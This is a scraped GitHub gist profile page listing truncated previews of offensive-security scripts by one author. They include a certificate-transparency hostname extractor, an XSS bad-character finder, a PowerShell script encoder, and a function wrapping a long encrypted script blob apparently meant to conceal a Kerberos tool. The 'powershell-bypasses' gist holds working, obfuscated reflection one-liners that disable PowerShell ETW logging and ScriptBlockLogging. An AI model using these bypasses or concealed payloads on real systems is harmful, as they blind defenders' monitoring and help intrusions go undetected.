Skip to content

Instantly share code, notes, and snippets.

Avatar

reigningshells

View GitHub Profile
@reigningshells
reigningshells / cert-transparency-extractor.py
Last active Jul 20, 2020
Simple script to extract hostnames from cert transparency logs at crt.sh
View cert-transparency-extractor.py
#!/usr/bin/env python3
import sys
import argparse
import requests
from lxml import html
import urllib3
# Nobody wants to see SSL warnings :-P
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
View cryptedkerb.ps1
function Expand-Script($Key)
{
$script = 'aYBcG3Uj0ZnntfLj7RcOGoI2DF7qsMjyiUl8sSgzNuiasymplD/6TedvjCI9NxVWeKoPGahMzCTi7XaBc1qUKQc0sFHiel6Ws4MnXSyd5KOXrTaA6DguIDDJAFypuittSp5ENc6A3SUZUHMB+dDHDwycN6cY6Olq7qB8c5Q2CiTdaieiwp7VbSCAgzJxD4QLQWlxqXDcaJ0caqnaPvUDgJUdgDvO9Ts6JBankNuMTaUsb02+ocZBz/7acSatXFLBQqi+1mAiIBDrCSoMYcFCswS0A9XNN5z/n1Z/ver8Qy53jJDBUrhwI79/4oKtdohzEbSyYtHs6JQKaanPGhtqlAZxiq1Y3IWFzt6xytNx6ULsKIASIo0CQ08dx5ECYZFpulo+LC+NrQxYzNigqkrgdHT01rEQr4EUFslvEknLEDOal9SRX2IfWTvKe64uUbWZmSmqLyOBajlEjvflEog5jKLVTXLY2fpzPVuJQANM8r5TcfO2GS7Sit2sb2cv8yZqWixypQtwqRgAjeDHuhtdKVk3cvfOyS7XoUzyv880DiTr1k5RAX0vxbqStjz41HP4FitJCHjfK4w4QljnllCAjU9n2bvqqQ3t2TMdFH2WTLs//cN1ci3gT3YKLo2UI/PUuZtYfv3pPRwtF+0aZncjAEFB413kUuDyotzFXqcfo0M/kq44LXsi1j7/YvmcJ9q6YfpcDxFmJ4+2wdk28iSMIOz9d303s2FU9K740jcM5ftdCD8/+vAT8lRg7zfUGZ5AHgb7864408gGgI4+xZKGK4FR+0RdAd7zs7D+yeIfWdkmYrcJ72+y7guk0Od+lFHrxQRWQLZ7MDjpjD1+qIu+O4YuSiUtDYLAix0iT3G8o3Kqq9lwZ3P9j42hwoNjrXI0TPY42OTGqZDRPUJl+V4bMy+0GTJ2Vq/+peNI4qjBPH0XPMU4+S1gizFPSPXKz/S4upC3yhP6fie6UVBPZAk
@reigningshells
reigningshells / script-encoder.ps1
Last active Jan 30, 2020
Just some script encoding musings
View script-encoder.ps1
Function Encode-Script
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Key
@reigningshells
reigningshells / powershell-bypasses.ps1
Last active Jul 16, 2020
Random PowerShell Bypasses
View powershell-bypasses.ps1
# Best logging bypass:
[ref]."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))
# ScriptBlockLogging Bypass
SEt-VARIaBLe O9z0 ([tyPE]("{2}{3}{1}{0}" -f'SEmbly','CTIoN.As','R','EFLE') ) ; sEt-vaRIABLE h2p5ts ([tYPe]("{0}{1}"-F 'r','eF') ) ; ( ChILDItEm VARIAble:o9Z0 )."V`AluE"::"l`oAd`WitHp`A`RTiaL`N`AME"(("{2}{3}{0}{1}"-f'or','e','System','.C'))."g`eTTy`pe"(("{7}{4}{2}{10}{8}{0}{11}{6}{5}{9}{1}{3}"-f 'e','e','stem','r','y','rovi','ntP','S','ics.Ev','d','.Diagnost','nting.Eve'))."GE`TFi`ELD"(("{1}{0}"-f 'abled','m_en'),("{4}{2}{3}{5}{1}{0}" -f 'stance','n','b','li','NonPu','c,I'))."SeT`VALUE"( ( gEt-vARiAbLe h2p5TS -vALUeONLY )."aS`sem`BLy"."G`Ett`YPe"(("{5}{8}{0}{2}{6}{3}{1}{4}{7}"-f 'r','twLogP','acin','E','rovid','System.Manage','g.PS','er','ment.Automation.T'))."G`EtfI`ELd"(("{3}{2}{0}{1}"-f
@reigningshells
reigningshells / badchars.py
Created May 24, 2019
Simple script to identify an XSS filters "bad characters"
View badchars.py
#!/usr/bin/env python
"""
Very simple script to automate the discovery of
bad characters in XSS filters that replace
the entire user input string with an empty string
[CR] = Carriage Return or \r
[LF] = Line Feed or \n
You can’t perform that action at this time.